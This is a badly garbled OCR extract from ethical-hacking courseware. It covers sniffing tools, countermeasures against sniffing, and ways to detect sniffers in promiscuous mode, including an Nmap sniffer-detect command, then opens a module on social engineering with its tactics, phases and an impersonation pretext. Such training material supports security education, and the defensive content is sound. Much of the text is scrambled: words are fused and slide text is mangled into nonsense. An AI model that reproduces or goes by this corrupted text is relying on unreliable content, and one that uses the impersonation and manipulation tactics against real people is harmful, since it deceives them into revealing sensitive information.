way. Thetool helps andtroubleshootthe problem
to analyze that

ical andCountermensores
Mackin ©by E-Comel
Copyright
 has (if
occurredany)
advancedprotocol analyzing,in-depth packet to
in the network.Itis alsoable perform
decoding,
It helpsyou to detectnetworkvulnerabilities.
reliablenetwork
forensics
andautomatic expertdiagnosis.

attackercan use this tool to sniff packets

‘An from the targetnetworkand detect
network
vulnerabilities

Se eI eer oe ET

OmniPeek
of
Figure856:Screenshot CasaNetwork Analyze

Source:https://www.liveaction.com
OmniPeekNetworkAnalyzer provides real-timevisibility
and expertanalysis
of each
partof the targetnetwork.Thistool will analyze, drill down,and fix performance
bottlenecksacross multiplenetwork segments. Analytic plug-ins
providetargeted
visualization
and searchabilitieswithin OmniPeek. TheGoogle Maps plug-in
enhances
the
analysis
of ofall
shows
window that Itpublic
a of
capabilitiesOmniPeek.
the locations
displaysGoogle
the
mapi n theOmniPeek
IPaddresses captured
capture
packets,
Attackerscan use OmniPeek to monitor andanalyze network trafficof the target
networkin real time,identifythe source locationof that traffic,
and attemptto obtain
as wellas findanynetworkloopholes.
sensitive information,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 857:Screenshot
Figure ofOmniPeok
Someexamples
of additionalsniffing
toolsare listedbelow:

Observer
Analyzer
PRTG
(https://www.viavisolutions.com)
(https://www.paessler.com)
NetworkMonitor
Deep
SolarWinds (https://www.solarwinds.com)
andAnalysis
PacketInspection
(https://www.xplico.org)
Xplico
PacketBuilder(hetps://www.colasoft.com)
Colasoft

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PacketSniffing
Toolsfor Mobile Phones

PacketSniffing
Tools for Mobile Phones
+
SnifferWicap
Source:https:/play.
google.com
Thistool is a mobilenetworkpacket
snifferfor ROOTARM droids.It workson rooted
Android
mobile
devices.
‘Attackers packets
can use thistool to capture for various typesof connections,
suchas
3G,andLTE,
Wi-Fi,

@
58:
Figure Sereenshat
ofSrifferWiap

Module
8 1182
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
FaceNiff
Source:http://faceniff
ponury.net
web session profiles
FaceNiffis an Androidapp that can sniffand intercept over a Wi-Fi

Thison
connection to a mobile. appworks rootedAndroid
shouldbe over open, WEP,WPA-PSK, or WPA2-PSK
devices. TheWi-Ficonnection
networkswhilesniffingthe sessions,

Packet
Capture
8
Figure59:Screenshot
ofFacet

Source:https://play.google.com
PacketCapture
is 2 networktraffic sniffer app with SSLdecryption.
It is a powerful
debugging
tool,especially
whendeveloping
an app.

Attackerscan use thistool to capturenetworkpackets

and record them,perform SSL
decryptionusing MITM techniques,andfurthershowpackets
i n eitherhexor text.

Figure
860:of
Packet
Screenshot

ical
Capture

andCountermensores ©by E-Comel

Mackin Copyright
 ModuleFlow

2 oo
ma
Sonn
Countermeasures
howan attackercarries out sniffing
The previoussection describes with differenttechniques
andtools.Thissection describescountermeasuresand possible
defensivetechniques usedto
sniffing
defenda targetnetworkagainst attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DefendAgainst
Sniffing
Restrict access tothenetwork
physica media sir
t o ensue that packet cannotbe installed

Useend:
to-end to protecconfidential
encryption information

athe MACaddresofthegeteway
Permanenty cache
tothe ARP

Usesate
adresses entries
for
andARPtables attackers
t o prevent from adding
spoofed
ARP

Tur off network

reste
identifieation
to protet thenetwork
brondears,
discovered
r ombeing
anf pose
wih sifing ols
thenetworkto authorized
uses

Use
1Ps
of
intead Pv protocol

ssslons,
Useencrypted
of
FTF,
suchaSH insteadof Telnet,
Secure instead
(SCP)
Copy and SSLfor

How to Defend Against

Sniffing
(Cont'd)

hip mee nrptonpotcl sich

Wana
WP
civics eepnon "|| BBY
SESS
uaa
se Secureile Transer
Protocol
(SFTP),
ofFP forthe secure transferJe
fet
stead
ne
oot datermine
m oe
promacvous
an NICs
are
anna

se P P andS/MIME,
‘Shel
VPN,S 06, SSL/TLS
Sand Getine passwords
Secure
OTP)
Use theconcept
Siow acest
ofAccesContra (AC)12
nts fed rang oftse Ls
How to DefendAgainst Sniffing
Listedbeloware some ofthecountermeasuresto befollowedto defend sniffing
against
Restrict physical
accessto the networkmediato ensure that a packet
sniffercannot be
installed
‘=
Useend-to-end
encryption confidential
to protect information
Permanently
addthe MACaddressthe gateway
of
to theARPcache

ical andCountermensores
Mackin ©by E-Comel
Copyright
Usestatic IP addresses the spoofed
andARPtablesto preventattackersfromadding
ARP in
entriesfor machines the network
and,if possible,
Turn off network identificationbroadcasts restrict the network to
authorizedusersto protectthe networkfrombeing with sniffing
discovered tools
UseIPv6insteadof IPv4
Useencrypted
sessions suchas SSHinsteadof telnet,SecureCopy (SCP)insteadof FTP,
andSSLforemailconnection to protectwirelessnetworkusersagainst
sniffingattacks
insteadof HTTPto protectusernamesandpasswords
UseHTTPS

of
Usea switchinstead the hub,as a switchdeliversdataonlyto the intendedrecipient
UseSecureFileTransferProtocol(SFTP)
insteadof FTPfor secure transferof files,
UsePGPandS/MIME, SSL/TLS,
VPN,IPSec, SSH, (OTP)
andone-time passwords
UsePOP2or POP3insteadof POPto downloademailsfromemailservers
UseSNMPv3insteadof SNMPv1andSNMPv2to manage networkeddevices
‘Always
encryptthe wirelesstrafficwith a strong protocol
encryption suchas WPA or
WPA2
RetrieveMACaddresses fromNICsinsteadof the OS;thisprevents
directly MACaddress
spoofing
Usetoolsto determine
if anyNICsare runningi n promiscuous
mode
Usethe concept of AccessControlList (ACL)
to allow accessonlyto a fixed rangeof
trustedIP addresses
i n a network

Change to complex
defaultpasswords passwords
broadcasting
‘Avoid SetIdentifiers)
$5IDs(Session
Implement
a MACfiltering
mechanismon yourrouter

Implement
networkscanningandmonitoringtoolsto detectmaliciousintrusions,
rogue
andsniffers
devices, connected
to thenetwork

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

2 oo
2 oo

eee
SniffingDetection Techniques
especially
It is very difficultto detect passivesniffers, whentheyare runningon a shared
Ethernet.Thissection discusses some sniffing
detectiontechniques.

8
Module 1188
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 How to DetectSniffing

‘Running
in RunNetworkTools
Promiscuous
Mode

(@Youneedtocheckwich
promiscuous
mode
Run
0S andsee

haschange
he MAC

(samplerouters
MACadaress)
(©
Runnetwork

9
tools
suchas

Analyer monitorh e
networkor detecting
strange

‘nd
read
packet
ha
each
network
its
arves about
wspicios actives
Enables
onscie,
you t o collect,
cortratae,ae
entirety nae rate dataacross

[es]
How to DetectSniffing
Itis not easyto detecta snifferon a networkas it onlycaptures dataand runs i n promiscuous
mode.Promiscuous modeallowsa networkdeviceto intercept and readeachnetworkpacket
that arrives in its entirety.Thesnifferleavesno trace as it does not transmit data.To find
sniffers,check for systems that are runningi n promiscuousmode, whichis an NIC modethat
allowsall packets (traffic)to passwithout validating their destinationaddress.Standalone
sniffersare difficultto detectbecause
methodhelps to detectnon-standalone not
theydo transmit datatraffic.Thereverse DNSlookup
sniffers.Thereare manytools,suchas Nmap, that are
availableto use
addresses
can detect sniffing
for
the detectionof promiscuous
of certain machineshavechanged
mode.Run IDS and note whetherthe MAC
(forexample, the router'sMACaddress). An IDS
activities on a network. It notifies or alertsthe administratorwhen a
suspicious activity,suchas sniffing or MAC spoofing, occurs. Networktoolssuchas Capsa
PortableNetworkAnalyzer monitor the networkfor strange packets suchas thosewith spoofed
addresses. Thistool can collect, consolidate, andanalyze
centralize, trafficdataacrossdifferent
networkresources andtechnologies.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SnifferDetectionTechniques:
PingMethod and DNSMethod ~—C|EH.

fa"
venta
oe *

Qenetineten
teases nmieseny
= = aa

wilitinn
1 ping
tote B
goonies

Sends eu pet machin

w sak

Sniffer Detection Techniques:

ARP Method

|@onlythe machineinthe
promiscuous mode (machine C
‘achestheARPinformation(P
mapping)
andMACadress

"Amachneinthepromiscuous
rose repondsothe ping

an
sillsend ARPprobe to
the source ofthe ping
ste oeteaneeset

identity

SnifferDetectionTechniques
Ping Method
To detect a sniffer on a network,identifythe systemon the network running i n
promiscuous mode.The ping methodis usefuli n detecting a systemthat runs i n
promiscuous mode, whichin turn helps
to detectsniffersinstalledon the network.
whereas the suspect
to
Justsenda pingrequestthe suspected
address.TheEthernetadapter
machine withits IPaddressandincorrect MAC
will rejectit becausethe MACaddressdoesnot match,
runningthe snifferresponds
machine to it, as it doesnot reject
packets
with a differentMACaddress. Thus, this responsewill identify the snifferi n the
network.

Figure8.61:
Promiscuous
mode
‘xamin beleamad Suspect
Machine

DNSMethod
The reverse DNSlookup of the DNSlookup
i s the opposite method.Sniffers using
reverse DNSlookup increase networktraffic.Thisincrease i n networktraffic can be an
indicationof the presenceof a snifferon the network. Thecomputers on thisnetwork

promiscuous
are i n
mode. or
Usersc an perform
a reverse DNSlookup remotely locally.Monitor theorganization’s
DNSserver to identify incomingreverse DNSlookups. Themethodof sending ICMP
requests to a non-existingIP addresscan also monitor reverse DNS lookups. The
computerperforming the reverse DNS lookup would respond to the ping, thus

asniffer.configure
identifyinghosting
it as

lookups,
For localreverse DNS the detectori n promiscuous mode.Sendan
ICMPrequest IPaddressandview the response.
to a non-existing If the system
receives
a the user can
response, identify
the responding
machineas performing
reverse ONS
lookups reverse DNSlookup
on the localmachine.A machinegenerating traffic will
most likely
be runninga sniffer.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ing >|
192.168.0.1)― Geep
ac: 00.16-2001.2345

Ping>Ela
(192.168.02) ONSLookup
>

Maccoobasetszed

Ping(192.168.0.3),
>|
a

Figure63:Sifingdetectionusing
theDNSmethod
Method
‘ARP
Thistechnique sendsa non-broadcast ARPto all the nodesin the network.Thenode
that runs in promiscuous modeon the networkwill cachethe localARPaddress. Then, it
will broadcast@pingmessage on thenetworkwith thelocalIPaddress buta different
MAC address. In this case,onlythe nodethat hasthe MAC address(cached earlier)will
be ableto respond to your broadcast ping request.A machinein promiscuous mode
replies to the ping message,as it hasthe correct informationaboutthe hostthat is
sending ping requests i n its cache;the remainingmachineswill sendan ARPprobe to
identify
running,
the source of the pingrequest.
will
This detectthe nodeon whichthe snifferis

“es
fD

renee wensea2

nonteaadet
a7 %
7)
864:
Figure
Detecting
sifing
method via the ARP

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PromiscuousDetectionTools

PromiscuousDetectionTools
+
Nmap
Source:https://nmap.org
Nmap's allowsyou to
NSEscript checkwhethera systemon a localEthernethasits
networkcardin promiscuous
mode.
Command
to detectNICi n promiscuousmode:
nmap --script=sniffer-detect [Target IP Address/Range
of IP
addresses]

ical andCountermensores
Mackin ©by E-Comel
Copyright
 865: Nmap
Figure Screenshot
showing output

une
NetScanTools
Pro
Source:https://www.netscantools.com
NetScanToolsPro includesthe Promiscuous ModeScanner tool to scan your subnetfor
network interfaceslisteningfor all Ethernetpackets
i n promiscuous mode.Security
professionals
use NetScanTools Proto scan the subnetwith modifiedARPpackets and
identify
devicesresponding to eachtypeofARPpacket.

&66: ScreenshotofNetcanToos
Figure Pro
—
PromiscuousModeScanner

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

nth
>
module,
have we

protocols
wunerable
slong
snfingconcepts wth
decussed
thefolowing
ta snifingandvarious hardware

snifing
spoofingsuchas
aac,MACONCP
attacks,
Vorious techniques
ONS
attacks,
withthei countermeasires
ee. slong
p oisoning.
ARPpoleoning,

thatare tobe employed

Variouscountermeasures sifing
in orderto prevent
attacks
Themodule
concuded
wih a detalled
dcusion on varlou snifingdetection

steal
Inthenextmodule,
we wildc
andpentesters,
performsci engineering
to eral formationrelated
othe

Module Summary
In thismodule, we havediscussed sniffing concepts alongwith protocols vulnerable to sniffing
andvarious hardwareprotocol analyzers.Wehavealsodiscussed various sniffing techniques,
suchas MACattacks, DHCP ARPpoisoning,spoofing
attacks, attacks,andDNSpoisoning,along
with their countermeasures.Thismodulealsoillustratedvarious sniffing tools.In this module,
we havealsodiscussed various countermeasuresto be employed to preventsniffing attacks.
Thismoduleendedwith a detaileddiscussion on various sniffing
detectiontechniques.
In the next module, i n detailhow attackers,
we will discuss as well as ethicalhackers andpen-
testers, perform
socialengineeringto steal criticalinformationrelatedto the target
organization.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CEH |
Certified Ethical Hacker

Module09:
ale]
Maatelia\-i-1a
SYofei(o]
 Module Objectives
Soll Engineering
Understanding Concepts

insider
Understanding Thveats

Understanding on Socal
Impersonation Networking
Ses

Diterent
Understanding Social Countermessues
Engineering

Understanding
OiferentInsiderThreats
andldentity
TheftCountermeasures

Module Objectives
moduleprovides
‘This Although
an overview of socialengineering. it focuseson fallaciesand
advocateseffectivecountermeasures, methodsof extracting
the possible informationfrom
anotherhumanbeing relyo n attackers’ Thefeaturesof thesetechniques
ingenuity. makethem
art, but the psychological nature of some of thesetechniques makesthema science. The
“bottom line―is that there is no ready defenseagainstsocialengineering;onlyconstant
Vigilance can circumvent somesocialengineering techniques
usedbyattackers,
Thismoduleprovides insight into human-based, computer-based, and mobile-basedsocial
engineeringtechniques.It alsodiscusses various insiderthreats impersonation
—
on social
networking theft,as well as possible
sites,identity countermeasures.

‘At engineering
+
willto
the endof thismodule,you
Describe
social
beable
concepts
‘+
Performsocialengineeringusingvarious techniques

Describe
+

insider threats
Performimpersonationon socialnetworking sites

Describe
identity
Apply
engineering
social
theft
countermeasures
Apply
knowledge
ofinsider
threatsandidentity
theftcountermeasures

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

0
2 Social
Engineering
TechalquesThott Hdentity

3) tnsidertireste Countermeasures

Social Engineering
Concepts
Thereis no single mechanism
security that can protectfromthesocialengineeringtechniques
used byattackers.Onlyeducating employees on how to recognize and respond to social
engineeringattackscan minimize attackers’ chances of success.Before
goingaheadwith this
module,i ts first necessaryto discuss
various socialengineering concepts.

This section describessocialengineering,frequent targetsof socialengineering,behaviors

vulnerableto attack,factorsmaking companies vulnerableto attack,whysocialengineeringis
effective,the principles
of
of socialengineering,andthe phasesa socialengineeringattack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is SocialEngineering?

Soci
ergnesing
“6
isthe
convincing
people
reveala of to canfdentalinormation

that he fc peopl
are unre of he valuble hich theyhave
cess

= i
What is Social Engineering?
(Cont'd)
Factorsthat Make Companies Whyis SocialEngineering
‘Vulnerable
to Attacks Erfective?

security
Insufcen
traning
Uncegulated
accesso information
(security potas are strong theirweet

1 to
is ict dotetsail engineering
tempts

Lack
ofsecurty
polices 1 secrty
method
applied
to
ensure
Theresno
Complete
that canbe
fom sal eagnetingattacks

Theres
no
specie
(©
haraware sofware
ox
(efndagnint9 ol l engineerinack
to

Whatis SocialEngineering?
Beforeperforming information
a socialengineeringattack,the attackergathers about the
target fromvarious
organization sources suchas:
‘Theorganization's IDs,names,andemailaddresses
whereemployees’
officialwebsites,
are shared

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ofthetargetorganization
Advertisements mediarevealinformation
cast through such
as products
andoffers.
Blogs,
forums,andotheronlinespaceswhereemployees sharebasicpersonaland
organizational
information.
After gathering
information,
an attackerexecutes socialengineering attacksusing various
approaches piggybacking,
suchas impersonation, tailgating,
reverse social
engineering,and
othermethods
Socialengineeringis the art of manipulating people to divulge
sensitive informationto use it to
perform s ome malicious action. Despite securitypolicies, attackerscan compromisean
organization's sensitive informationbyusing socialengineering, whichtargets the weakness of
people, Most often,employees are not even aware of a security lapse o n their part and
inadvertently revealthe organization's criticalinformation.Forinstance, unwittingly answering
strangers’
questions or replying to spamemail
To succeed, attackerstake a special interest i n developing socialengineeringskillsand can be
so proficient that the victims might not even notice the fraud.Attackersalways lookfor new
waysto accessinformation, They alsoensure that theyknowthe organization’s perimeter and
the people on its perimeter, suchas security guards, and help-desk
receptionists, workers, to
exploithumanoversight. People haveconditionedthemselves to not beoverly suspicious,and
theyassociatespecific behaviorsandappearanceswith knownentities. Forinstance, a m an i n a
Uniform carryinga pileof packages fordelivery will beperceived as a delivery person.Withthe
helpof socialengineering tricks,attackerssucceedi n obtaining confidentialinformation,
authorization, and access detailsfrom people by deceiving and manipulating human
vulnerability
CommonTargets of SocialEngineering

Asocialengineerusesthe vulnerability
people
of humannature as theirmost effective
believeandtrust othersandderivefulfillmentfromhelping
are the most common targets
the needy.
ofsocialengineeringin an organization:
tool. Usually,
Discussed below

Receptionistsand Help-Desk Personnel:Socialengineersgenerally targetservice-desk

or help-desk personnel bytricking them into divulging confidentialinformationabout
the organization. To extract information, suchas a phone numberor password, the
attackerfirst wins the trust of the individualwith the information.On winningtheir
trust, the attackermanipulates them to get valuableinformation. Receptionistsand
help-desk staff may readilyshareinformationif theyfeel theyare doing so to helpa
customer.
TechnicalSupport Executives: Another targetof socialengineersis technicalsupport
executives.Thesocialengineersmaytakethe approach of contactingtechnicalsupport
executives to obtain sensitive informationbypretending to be senior management,
customers, vendors,or otherfigures.

SystemAdministrators: is responsible
A systemadministratori n an organization for
Thus,theymayhavecriticalinformationsuchas the typeand
the systems,
maintaining

ical andCountermensores
Mackin ©by E-Comel
Copyright
 version thatcouldbe helpful
of OSandadminpasswords, foran attackerin planning
an
attack.
Users andClients:Attackerscouldapproachusers andclientsof the target
organization,
pretending
to bea techsupport personto extractsensitive information,
Vendorsof the Target
Organization:
Attackersmay also targetthe vendorsof the
organization
to
gain
critical
that
could
information helpi n executing
Senior Executives:Attackerscould also approach
attacks.
senior executives from various
departmentssuchas Finance, HR,and CxOsto obtain criticalinformationabout the
organization
Impactof Social Engineering
Attack on an Organization
Socialengineeringdoesnot seem likea serious threat,
but it can leadto substantial
losses
for
organizations.
EconomicLosses:
of
Theimpactsocial engineeringattackon organizations
Competitors
include:
may use socialengineering techniques
to stealsensitive
information
suchas the development plansand marketing of the target
strategies
company,whichcan resulti n an economic loss.
to Goodwill: For
Damage an goodwill
organization, is importantfor attracting
customers. Socialengineeringattacksmay damage byleaking
that goodwill sensitive
organizational
Lossof Privacy:
data,
Privacy
is a major concern, especiallyfor bigorganizations.
If an
organizationis unableto maintain the privacyof its stakeholders
or customers,then
people can losetrust i n the companyand maydiscontinue their businessassociation
Consequently,
with the organization. the organizationcouldfacelosses.
Dangers
of Terrorism:Terrorismand anti-socialelementspose a threat to an
organization's
assets people
andproperty.
—

Terroristsmay use socialengineering

techniquesto makeblueprints of their targetsto infiltratetheir targets.
Lawsuits and Arbitration: Lawsuits and arbitrationresulti n negative publicity
for an
andaffects
organization performance.
the business's
Temporary
or PermanentClosure:Socialengineeringattackscan result in a lossof
goodwill.
Lawsuits andarbitrationmayforcethe temporary
or permanentclosureof an
andits business
organization activities.
Behaviors Vulnerable to Attacks
Authority
Authority
impliesthe rightto exercise power in an organization.
Attackerstake
advantageof this bypresentingthemselvesas a personof authority,such as a
technicianor an executive,i n a targetorganization
to stealimportant
data.
Forexample,
an attackercan calla user on the phone
networkadministrator
i n the targetorganization.
and can claimto be working a
Theattacker
theninformsthe victim
incident in the network and asksthem to provide
about a security their account
as
ical andCountermensores
Mackin ©by E-Comel
Copyright
credentials
to protecttheirdata against
theft.Afterobtaining
thevictim'scredentials,
the attackerstealssensitive informationfromthe victim’s
account.
Intimidation
Intimidationrefersto an attemptto intimidatea victim into taking
severalactions by
usingbullying tactics.It is usually
performed byimpersonating
some otherpersonand
manipulating usersinto disclosing
sensitive information.
Forexample, an attacker mightcallthe executive's with thisrequest:
receptionist
"Mr. Tibiyani
is about to give @bigpresentationto the customers,butheis unableto
open hisfiles;
filesto me
so
immediately call
it seems theyare corrupt.

talk.―
Hetold m e to
that hecan start his
you andaskyou to sendthe

ConsensusoF SocialProof
Consensusor socialproof people usually
willing
refersto the factthat are to like things
or
dothat
other
things
people orthings
advantage bydoing
Attackerstake
like do.
ofthis likecreating
websites fake
and posting
testimonialsfrom users about the benefitsof certain products suchas anti-malware
{rogueware).Therefore, if users searchthe Internet to downloadthe rogueware,they
encounter these websitesand believe the forgedtestimonials.Further,if users
download
Scarcity
themalicious product, attackers
mayinstalla trojan
along
withit.

implies
Scarcity the state of beingscarce. In the context of socialengineering,
scarcity
oftenimpliescreating a feelingof urgencyin a decision-making process,Due to this
urgency,attackerscan controlthe informationprovided to victims and manipulatethe
decision-makingprocess.
whenApple
Forexample, releases product
a new iPhone thatsellsout andgoesout of
stock,
attackerscan take advantage
of this situation bysending
a phishing
emailto the
targetusers, encouragingthem to clickon a link provided
i n the emailto buythe
product. If the users clickon this link,theyget redirectedto some maliciouswebsite
controlledbythe attacker.As a result, the user might end up revealing their account
detailsor downloading some malicious programs suchas trojans.
Urgency
Urgency implies encouragingpeople to take immediate action. Attackersc an take
advantage of thisbytrickingvictims into performing unintendedtasks.
Forexample, ransomware often usesthe urgencyprinciple, whichmakesthe victim take
urgent action undera time-limit.Thevictims see the countdowntimer runningon their
infectedsystems andknowthat failure to makethe required decisionwithin the given
time can

Similarly,
the
loss
resulti n
data.
important of
phishing indicating
attackerscan send emails that a certain productis available

ata and that

lowprice
tobuy should it, the user clickon the “BuyNowâ€link,The
•
user is

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tricked,andtheyclickon the link to takeimmediateaction. As a result,theyare
redirectedto a maliciouswebsite and end up revealing
their account details or
downloading
a virus file.

Familiarity
or Liking

whenthey or
Familiarity
liking implies
that people
a re askedbysomeone whomthey
likelyto buyproducts
are more likelyto be persuaded
that people
like.Thisindicates are more
if theyare advertisedbyan admiredcelebrity.
to dosomething

For example, people more likelyto allowsomeone to lookover theirshoulderif they

are
likethat personor theyare familiarwiththem.If people do not likethe person,they
immediately recognizetheshouldersurfing attackandpreventit. Similarly,
peopleoften
allowsomeone to tailgate
themif theylikethat personor are familiarwith ther. In
some cases, socialengineers use a charming
smileandsweet-talkto deceivethe other
person
Trust
into them,
liking

Attackersoften attemptto build a trustingrelationship

with victims
For example, an attackercan call a victim andintroducethemselfas a security
expert.
Then,theymayclaimthattheywere working withXYZcompany,andthey noticedsome
unusualerrors sent from the victim’s Theattackerbuildstrust byusing the
system.
companyname andtheir experiencei n the security field.Afterestablishing
trust, the
attackerguides the victim to follow a series of stepsto “viewanddisablethe system
They
errors.― latersendan emailcontaining fileandpersuade
a malicious the victim to
click o n and downloadit. Through this process, the attacker successfully installs
malware o n thevictim's
information.
system, infecting it andallowing
to
the attacker stealimportant

Greed
Some peopleare possessivebynature and seekto acquirevast amounts of wealth
through
illegal
activities. Socialengineerslure their targetsto divulge
informationby
promisingsomething
For example,
for nathing
an attacker
(appealing
maypretend
to
their
greed)
to bea competitor
andlure theemployees
of the
targetinto revealingcriticalinformationbyoffering
a considerable
reward.
Factorsthat Make Companies Vulnerable to Attacks
Manyfactorsmakecompanies some of them are as
vulnerableto socialengineeringattacks;
follows:
InsufficientSecurityTraining
Employees can beignorant aboutthesocialengineeringtricksusedbyattackersto lure
them into divulgingsensitive data about the organization.Therefore, the minimum
responsibility
ofanyorganization is to educatetheir employees
aboutsocial engineering
techniquesandthe threatsassociated withthemto preventsocialengineering attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Unregulated to Information
Access
Foranycompany,one of its main assetsis its database.Providingunlimitedaccessor
allowing
everyone access to such sensitive data mightcause trouble. Therefore,
companies must ensure propertraining of keypersonnel
for andsurveillance accessing
sensitive data,
SeveralOrganizational
Units
‘Some
organizations geographic
havetheirunits at different locations, making it difficult
to managethe system.
Further,this sort of setupmakesit easier for an attackerto
accessthe organization's
sensitive information.
Lackof Security Policies
Securitypolicy the foundationof securityinfrastructure.It is a high-level
i s document
describingthesecurity controls implemented An organization
i n a company. shouldtake
extreme measures related to every possible securitythreat or vulnerability.
Implementation of certain securitymeasures suchas password change policy,
informationsharing policy,accessprivileges,
uniqueuser identification,
andcentralized
prove to bebeneficial
security,
Whyis Social Engineering Effective?
Like
other
techniques, socialengineering doesnot dealwith networksecurity
dealswiththepsychological manipulation of ahumanbeing
issues;instead,
to extract desired
it
information,
Thefollowing are reasonswhy socialengineeringcontinuesto be effective:
=
Despite various security policies,
preventing socialengineering is a challengebecause
humanbeings are most susceptible
to variation,
It is challenging to detectsocialengineeringattempts. Socialengineeringis the art and
science of manipulating into divulging
people information.
complete
No methodguarantees fromsocialengineeringattacks.
security
No specific
hardware or software to safeguard
is available againstsocialengineering
attacks
Thisapproach
is relatively
(or
cheap free)andeasyto implement.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Phasesof a SocialEngineering
Attack

Researchthe TargetCompany
"©

Dumpster
diving,
websites,
employes,
SelectaTarget
ofcompany, tour the ee

frustrated
Identity
employees
the
target
company
Develop
a Relationship

© Develop eatonship
with the selectedemployees

Exploitthe Relationship

a
Phasesof SocialEngineering
Attackerstakethe following
steps
to
Attack
execute a successful
socialengineering attack:
+
Research the Target Company
Before attacking the targetorganization’s network, an attacker gathers enough
informationto infiltrate the system. Socialengineeringis one technique that helps in
extractinginformation.Initially, the attackerresearches basicinformationabout the
targetorganization, such as the nature of the business, its location,numberof
‘employees,
dumpster
and
other
facts.
diving,
the
company's
Whileresearching,

website,
browsing
the attackerindulges
andfinding
i n activities suchas
employee details.
Selecta Target
After finishingtheir research,the attackerselectsa targetfor extracting sensitive
information aboutthe organization. Usually,attackerstry to reachout to disgruntled
employees because theyare easier to manipulate.
Develop
a Relationship

Oncethe targetis set, the attackerbuildsa relationship

with that employee
to

their
accomplish task
the Relationship
Exploit
The attackerexploits
the relationship
and extracts sensitive informationabout the
organization's financeinformation,
accounts, technologiesin use, andupcoming plans.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

3) tnsidertireste Countermeasures

Social Engineering
Techniques
Attackersimplement techniques
various socialengineering sensitive information
to gather from
people that mighthelpthemto commit fraudor participate
or organizations i n othercriminal
activities.
This section dealswith various human-based, and mobile-basedsocial
computer-based,
engineering
techniques, for a betterunderstanding.
codedwith examples

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of SocialEngineering
Types
Sensitiveinformationgathered
Techniques: noernaton by ©
interaction
arose vie ©
eon Te

Information
‘Sensitive withthe help
i gathered ofmobile
apps

of SocialEngineering
‘Types
In a socialengineering attack,
the attackeruses their socialskillsto trick the victim into
disclosing
personal
information
suchas creditcardnumbers, andphone
bankaccountnumbers,
numbers,
or confidentialinformationabouttheir organization
or computer Attackers
system.
use thisdatato either launchan attack or to commit fraud. Socialengineeringattacksare
categorized
into threecategories: human-based, computer-based, andmobile-based

Human-based
Social
Human-based Engineering
=

socialengineeringinvolveshumaninteraction. Acting as though they

were a legitimate person,the attacker interacts with the employee of the target
organization to collectsensitive information, suchas businessplans
and networks, that
might helpthem in launching their attack.Forexample, an IT support
impersonating
technician,the attackerc an easily access the server room.

attacker can
‘An perform
human-basedsocialengineeringbyusing the following
techniques
© Impersonation Tailgating
Vishing Diversion Theft

Eavesdropping
Surfing
Shoulder >
HoneyTrap
Baiting
DumpsterDiving QuidProQuo
SocialEngineering
Reverse Elicitation
Piggybacking
ical andCountermensores
Mackin ©by E-Comel
Copyright
Computer-based
SocialEngineering
Computer-based
socialengineeringrelieson computers
andInternet systems
to carry

out
The
the targeted
following
action.

techniques can beusedfor computer-based

socialengineering:

Phishing
‘Spam mail
0

©
Pop-up
attacks
window
Scareware
©
chat
Instant messenger
‘Mobile-based
SocialEngineering
Attackers use mobile applications to carry out mobile-basedsocial engineering,
Attackerstrickthe usersbyImitating
applications
popular
with attractive featuresand submitting
the samename. Usersunknowingly
and
applicationscreating maliciousmobile
themto the majorappstores with
downloadthe maliciousapp,allowing the malware
to their
infect device.
attackersu se to perform
Listedbelow are some techniques mobile-based
social
engineering:
© Publishingmaliciousapps ©. Using applications
fakesecurity
© Repackaging
legitimate
apps © SMiishing
(SMSPhishing)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Human-basedSocialEngineering
Impersonation
“a
(9 acer pretends
Theattcher
may tobe
someone
legimate
authorized
impersonate
person
lepine or
oan

authored
prion
ether
erinalor nga mediumsch
communication at

attackers
18 impersonation
target
helps
revealing
sensitive
nfrmation
oka ito

Impersonation
Examples

Human-basedSocialEngineering
(Cont'd)

Tmpersgnation
|&-Vshing
|" aahe
(oie or VoPphishing)an
ks indvdulsto reveal
impersonation
andnani
personal
(electronic
teehngue fraud) i n
using
infarmaton voc which
the
technology

"Thin
party Authorization ‘Tech
Support

estar
praca te

9
Module 1210
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Human-basedSocialEngineering
(Cont'd)
Eavesdropping Shoulder Surfing DumpsterDiving

(©tnvives coc phone

ils

Human-basedSocialEngineering
(Cont'd)

Engineering
or
ater
te
information
needs
before feng tat he stacker

Megincing
| fame
©
connate
Tangating |" None wearing
18The atacer,
dbade,
orafake
pon troughs
ene
ro
Sycos olowingen

9
Module 1212
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 Human-basedSocialEngineering
(Cont'd)

Baiting es let
na people
lcaton where can

QuidPre que | &

Human-based Social Engineering

Impersonat
Impersonation
is a common human-based socialengineeringtechnique where an attacker
pretends
to be a legitimateor authorized
person.Attackersperformimpersonation attacks
personally
or use a phoneor anothercommunication mediumto misleadtheir targetandtrick
‘them
intorevealing
information.Theattackermight
impersonate
a courier or delivery
person,
janitor,businessman,
client,technician,
or theymay pretend
to be a Usingthis visitor.
the attackergathers
technique, sensitive informationbyscanningterminalsfor passwords,
for importantdocumentson employees’
searching desks,rummagingthrough bins,and
‘through
other tactics.Theattackermay even try to overhearconfidentialconversations and
“shoulder
Types
obtain
surf―
to
sensitive
of impersonation
information,
usedi n socialengineering:
Posing

Posing
asa
legitimate
user
asan important
end-user

Posing

Posing
support
technical
asa
agent client,or vendor
as an internalemployee,

as
aover-helpfulness
Posing repairman

‘Abusing
Posing
the

someone
as
with ofthe
help
desk
third-party
authorization
agent
through
as a techsupport
Posing
Posing
vishing
as a trustedauthority

ical andCountermensores
